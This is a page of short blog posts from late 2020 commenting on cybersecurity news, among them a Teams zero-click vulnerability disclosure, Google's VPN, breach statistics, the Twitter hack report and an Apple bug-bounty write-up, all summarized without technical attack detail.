Interesting Post on Microsoft Github: Teams Vulnerability
December 9, 2020
I found this interesting post on Github, one of Microsoft’s open source plays. “Important, Spoofing” – Zero-Click, Wormable, Cross-Platform Remote Code Execution in Microsoft Teams.” The post explains how to compromise a Teams environment by sending or editing an existing Teams message. The message looks just peachy to the recipients or recipients. Teams is plural. When the recipient looks at the message the malicious payload executes. The post points out:
That’s it. There is no further interaction from the victim. Now your company’s internal network, personal documents, 365 documents/mail/notes, secret chats are fully compromised. Think about it. One message, one channel, no interaction. Everyone gets exploited.
Microsoft calls the exploit spoofing. Keep in mind that Microsoft has more than 100 million active users of its Zoom killer.
Stephen E Arnold, December 9, 2020
DarkCyber for December 1, 2020, Now Available
December 1, 2020
DarkCyber reports about Maltrail, an open source cyber tool for detecting malicious traffic. Crime as a Service matures. Now anyone can point-and-click through a ransomware attack. Bad actors helpfully make cyber crime less of a hassle. Insider threats — what DarkCyber calls “the Snowden play” — are becoming more prevalent. Why? A need for money, revenge, or a dose of that old Silicon Valley attitude.
The feature in this episode is a summary of the next-generation in entity recognition from videos and still images. Face recognition is not the most reliable technology in the world; however, researchers from China and Japan have figured out how to match a person’s gait to an individual. Ergo gait recognition. A link to the technical details appears in the program.
The program features a brief extract from a conversation between Robert David Steele, a former CIA professional, and Stephen E Arnold (owner of Dark Cyber). Arnold describes some of the less appreciated reasons why digital information creates new challenges for law enforcement and intelligence professionals. Good news? Not really.
The final story in the program addresses the urgent need for counter unmanned aerial systems by local, county, and statement law enforcement agencies. Individuals are ramming drones into police helicopters. The DarkCyber discussion of this problem includes a link to a series of recommendations promulgated by the British government to address this kinetic use of drones.
DarkCyber is produced by Beyond Search. The video program appears every two weeks. The third season of DarkCyber begins in January 2021. The program is non-commercial, does not accept advertising, and does not beg for dollars. How is this possible? DarkCyber is not sure.
You can view the program at this link.
Kenny Toth, December 1, 2020
Virtual Private Networks: Are These Private?
November 30, 2020
About a month ago, Google rolled out its own virtual private network. The timing was mostly in sync with Facebook’s expansion of encrypted services for its chat apps. Is encryption good for users, good for large technology companies, and good for law enforcement.
The story “Google One VPN: Everything You Need To Know” is representative of the coverage of Google’s VPN. I noted:
Google isn’t new to the world of VPNs. It actually has used one for its customers on Google Fi for many years now. Essentially with Google Fi, whenever you connected to a public WiFi network, you would automatically be connected through Google Fi’s VPN. As mentioned before, this is because Public WiFi networks are not secure. So while keeping you from using a lot of data, since Fi charges per gigabyte, it also kept you protected. Now, Google is just moving its VPN to where everyone can use it. Whether they are a Fi customer or not.
The write up does not answer the question about the “goodness” of the Google service. The write up asserts:
Google has said numerous times that it will not use the VPN connection to track, log or sell your browsing activity. But then again, how will we know that Google is not doing that? We won’t. And that goes for any other company too. It’s up to you, whether you trust Google not to collect this data when you’re using its VPN. But don’t forget, that if Google really wanted that data, it could easily get it from your Android smartphone too.
As I said in response to questions posed to me by a former CIA professional (view full 20 minute video here):
Online services are inherently surveillance mechanisms.
Many will not agree with this Arnold Law. That’s okay, but VPNs are particularly interesting because the user agreeing to participate in an allegedly secure and private man in the middle service. How secure is a man in the middle service?
Another good question just like “Are VPNs private?”
Stephen E Arnold, November 30, 2020
Amazon and the Cyber Security Industrial Complex
November 24, 2020
This is probably no big deal. Cyber security, threat intelligence, and wonky proprietary tools from startups populated by retired or RIFed intel officers are a big business. I was asked by a “real news” reporter, “How big?” I dutifully sent links to companies selling market forecasts for global cyber security revenues. How big were these numbers? Acquisition big. The hypothesis I have formulated is that when wild and crazy market size projections fly like hungry sparrows, there is a revenue problem. Specifically there are too many sparrows chasing available bugs and bread crumbs. That’s why Blackberry is in the cyber security business. Why LookingGlass stepped away from Cyveillance. That’s why Dark Web indexes of bad actors’ Crime as a Service offerings are a dime a dozen.
It is, therefore, no surprise that the write up “Trend Micro integrates with AWS Network Firewall” explains that Amazon is continuing to add to its pool of 65,000 plus partners. Many of these outfits like Palantir Technologies are in the cyber intelligence and cyber threat business. Bad actors beware.
The write up reports:
Trend Micro’s built-in IPS intelligence will inspect traffic for malicious intent so that the firewall can stop threats before they get a foothold in a virtual private cloud. Together, AWS and Trend Micro offer a simple, scalable service with reliable protection that does not require any infrastructure management.
What’s the hook? Here’s the statement I circled with an Amazon happy face:
Trend Micro’s threat intelligence will be available free with easy deployment for AWS Network Firewall customers.
What do I make of free cyber security services? No much but I hear the Bezos bulldozer pulling into the cyber intelligence and security services shopping mall. Roll up or roll over time for the cheerful orange machine with a big smile painted on the cab.
Stephen E Arnold, November 24, 2020
Work from Home: Manage This, Please
November 19, 2020
I read “Over Half of Remote Workers Admit to Using Rogue Tools Their IT teams Don’t Know About.” If the information in the write up is on the money, cyber security for the WFH crowd may be next to impossible. The write up reports:
According to a new report from mobile security firm NetMotion, the vast majority of remote workers (62 percent) are guilty of using Shadow IT, with some of them (25 percent) using a “significant number” of unapproved tools.
The article includes this statement:
“Sadly, our research showed that nearly a quarter of remote workers would rather suffer in silence than engage tech teams,” said Christopher Kenessey, CEO of NetMotion.
Net net: Bad actors relish the WFH revolution. The inducement of WFHers using software not vetted by their employer creates numerous opportunities for mischief. How does a firm addicted to Slack and Microsoft Teams deal with this situation:
Hey, team. I am using this nifty new app. It can speed up our production of content. You can download this software from a link I got on social media. Give it a whirl.
Manage this, please.
Stephen E Arnold, November 19, 2020
Security Is a Game
November 12, 2020
This article’s headline caught my attention: “Stop Thinking of Cybersecurity As a Problem: Think of It As a Game.” I think I understand. The write up asserts:
The thing is, cybersecurity isn’t a battle that’s ultimately won, but an ongoing game to play every day against attackers who want to take your systems down. We won’t find a one-size-fits-all solution for the vulnerabilities that were exposed by the pandemic. Instead, each company needs to charge the field and fend off their opponent based on the rules of play. Today, those rules are that anything connected to the internet is fair game for cybercriminals, and it’s on organizations to protect these digital assets.
Interesting idea. Numerous cyber security solutions are available. Some organizations have multiple solutions in place. Nevertheless, bad actors continue to have success. If the information in Risk Based Security 2020 Q3 Report Data Breach QuickView is anywhere close to accurate. The “game” is being won by bad actors: Lots of data was sucked down by cyber criminals in the last nine months.
Fun, right?
Stephen E Arnold, November 12, 2020
Organizational Security: Many Vendors, Many Breaches
October 30, 2020
I noted a write up with a fraught title: “Breaches Down 51%, Exposed Records Set New Record with 36 Billion So Far.” I interpreted this to mean “fewer security breaches but more data compromised.”
The write up explains the idea this way:
The number of records exposed has increased to a staggering 36 billion. There were 2,935 publicly reported breaches in the first three quarters of 2020, with the three months of Q3 adding an additional 8.3 billion records to what was already the “worst year on record,” Risk Based Security reveals.
Okay. How is this possible? The answer:
The report explores numerous factors such as how media coverage may be a factor contributing to the decline in publicly reported breaches. In addition, the increase of ransomware attacks may also have a part to play.
I interpreted this to mean, “Let’s not tell anyone.”
If you want a copy of this RiskBased Security report, navigate to this link. You will have to cough up an email and a name.
Net net: More data breaches and fewer organizations willing to talk about their security lapses. What about vendors of smart cyber security systems? Vendors are willing to talk about the value and performance of their products.
Talk, however, may be less difficult than dealing with security breaches.
Stephen E Arnold, October 30, 2020
Cyber Sins: Part of the Human Condition Permanently
October 24, 2020
Business operations have secrets and maybe sins. Medium explains “The Seven Deadly Sins Of Cybersecurity.” Using the metaphor of the biblical seven deadly sins: greed, gluttony, lust, envy, sloth, wrath, and pride, the article compares social media platforms to the digital manifestation of them. The write up argues that cybersecurity is demonized by seven deadly sins.
What’s a sin?
Covid-19 has made cyber security more important than ever as people are forced to work from their homes. Organizations need cybersecurity to protect their information and the pandemic exposes all weaknesses in organizations’ cybersecurity culture, if any exists. Another sin is believing a layered, complex solution equals a decent security plan. Complexity actually creates more problems, especially when plans involve too much overhead management and talking about “doing something” instead of taking action.
Credential abuse is also a deadly sin. One commits credential abuse in the over reliance of simple passwords. People love simple passwords, because they are easy to remember and they hate complex credential systems because they are annoying. It might be better to find an alternative solution:
“So what solutions should you start exploring? Identity & Access Management, Privileged Access Management (PAM), Just-In-Time/Just-Enough Administration, Role-based access controls, Multi-Factor Authentication, and more. What about Single Sign-On? Federated Identity management? everyone must adhere to secure credential management without exception…In climbing, free-soloing might be the epitome of cool, but when you fall, you’ll wish you had a belay.”
The article advises to be aware that you cannot treat all of your information the same way. The example the article uses is treating a mobile number differently than a credit card number. It is important to be aware of how any information posted online could be potentially harmful.
Then an ultimate sin is not paying attention to blind spots:
“Many threats “hide in plain sight” and we don’t have the time, energy, and resources to look for them, let alone know where to start.This problem is due to complexity, a lack of resources, and too many gaps and overlaps.”
The key to absolving this sin is discovering the blind spots, then developing solutions.
Sin, however, is part of the human condition. Bad actors sense opportunities and exploit them. Cyber crime continues to thrive and become more pervasive.
Whitney Grace, October 24, 2020
Twitter for Verification: The Crypto Approach
October 21, 2020
New York State’s Twitter Investigation Report explores the cybersecurity “incident” at Twitter and its implications for election security. If you don’t have a copy, you can view the document at this url. The main point of the document struck me as this statement from the document:
Given that Twitter is a publicly traded, $37 billion technology company, it was surprising how easily the Hackers were able to penetrate Twitter’s network and gain access to internal tools allowing them to take over any Twitter user’s account.
With the Department of Financial Services’ report in mind, I found the information in “.Crypto Domain Owners Can Now Be Verified With Twitter Accounts for Safer Payments” interesting. Twitter and “safer” are not words I would associate. The write up reports:
Blockchain startup Unstoppable Domains and oracle network Chainlink have launched a new feature allowing individuals or entities with blockchain domains to authenticate themselves using their Twitter accounts. The feature is powered by Chainlink oracles, which connect each .crypto address from Unstoppable Domains to a public Twitter username. The firms said the Twitter authentication could help stem crimes in cryptocurrency payments such as phishing hacks.
In one of our Twitter tests, we created an account in the name of a now deceased pet. Tweets were happily disseminated automatically by the dog. Who knew that the dead dog’s Twitter account can reduce phishing attacks?
Twitter: Secure enough to deliver authentication? The company’s approach to business does not give me confidence in the firm’s systems and methods.
Stephen E Arnold, October 21, 2020
Apple and AWS: Security?
October 13, 2020
DarkCyber noted an essay-style report called “We Hacked Apple for 3 Months: Here’s What We Found.” The write up contains some interesting information. One particular item caught our attention:
AWS Secret Keys via PhantomJS iTune Banners and Book Title XSS
The information the data explorers located potential vulnerabilities to allow such alleged actions as:
- Obtain what are essentially keys to various internal and external employee applications
- Disclose various secrets (database credentials, OAuth secrets, private keys) from the various design.apple.com applications
- Likely compromise the various internal applications via the publicly exposed GSF portal
- Execute arbitrary Vertica SQL queries and extract database information
Other issues are touched upon in the write up.
Net net: The emperor has some clothes; they are just filled with holes and poorly done stitching if the write up is correct.
Stephen E Arnold, October 13, 2020
-
- Subscribe to Beyond Search
Feature archive
News archive
-
